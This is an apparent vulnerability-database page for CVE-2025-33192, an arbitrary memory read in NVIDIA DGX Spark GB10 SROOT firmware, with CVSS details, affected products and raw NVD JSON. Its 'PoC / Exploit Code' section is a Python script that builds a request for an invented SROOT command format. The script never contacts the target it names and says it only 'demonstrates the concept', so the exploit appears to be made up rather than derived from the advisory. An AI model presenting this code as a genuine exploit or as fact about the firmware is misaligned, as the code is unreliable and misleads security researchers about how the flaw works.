Security Vulnerability Report
中文
CVE-2025-33192 CVSS 5.7 MEDIUM

CVE-2025-33192

Published: 2025-11-25 18:15:51
Last Modified: 2025-12-02 18:19:32

Description

NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause an arbitrary memory read. A successful exploit of this vulnerability might lead to denial of service.

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:nvidia:dgx_os:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nvidia:dgx_spark:-:*:*:*:*:*:*:* - NOT VULNERABLE
NVIDIA DGX Spark GB10 (SROOT firmware < fixed version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-33192 PoC - NVIDIA DGX Spark GB10 SROOT Firmware Memory Read # This PoC demonstrates the arbitrary memory read vulnerability in SROOT firmware import struct import sys def create_malicious_sroot_request(): """ Craft a malicious SROOT firmware request that triggers arbitrary memory read """ # SROOT command header header = struct.pack('<I', 0x534F4F54) # 'SOOT' magic header += struct.pack('<I', 0x00000001) # Version header += struct.pack('<I', 0x100) # Length # Malicious payload - triggers arbitrary memory read # Command type: 0x05 = MEMORY_READ cmd_type = struct.pack('<I', 0x05) # Target memory address (arbitrary) target_addr = struct.pack('<Q', 0xFFFFFFFFFFFFFFFF) # Read length read_len = struct.pack('<I', 0x100) payload = cmd_type + target_addr + read_len return header + payload def exploit_sroot_vulnerability(target_ip='192.168.1.100'): """ Exploit the SROOT firmware vulnerability """ print(f"[*] Targeting: {target_ip}") print("[*] Crafting malicious SROOT request...") malicious_req = create_malicious_sroot_request() print(f"[*] Payload size: {len(malicious_req)} bytes") print(f"[*] Payload hex: {malicious_req.hex()}") # Note: Actual exploitation requires direct access to DGX Spark device # This PoC demonstrates the concept only print("[-] This is a proof-of-concept for educational purposes") print("[-] Actual exploitation requires local access to NVIDIA DGX Spark GB10") return malicious_req if __name__ == "__main__": target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.100" exploit_sroot_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33192", "sourceIdentifier": "[email protected]", "published": "2025-11-25T18:15:50.807", "lastModified": "2025-12-02T18:19:32.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause an arbitrary memory read. A successful exploit of this vulnerability might lead to denial of service."}, {"lang": "es", "value": "NVIDIA DGX Spark GB10 contiene una vulnerabilidad en el firmware SROOT, donde un atacante podría causar una lectura de memoria arbitraria. Un exploit exitoso de esta vulnerabilidad podría conducir a una denegación de servicio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:L", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.5, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-690"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nvidia:dgx_os:-:*:*:*:*:*:*:*", "matchCriteriaId": "40EF912C-72C4-4758-9157-169CE92B33C5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:dgx_spark:-:*:*:*:*:*:*:*", "matchCriteriaId": "76975E53-4E5C-4C6D-85D9-EE2879F960DF"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33192", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5720", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33192", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}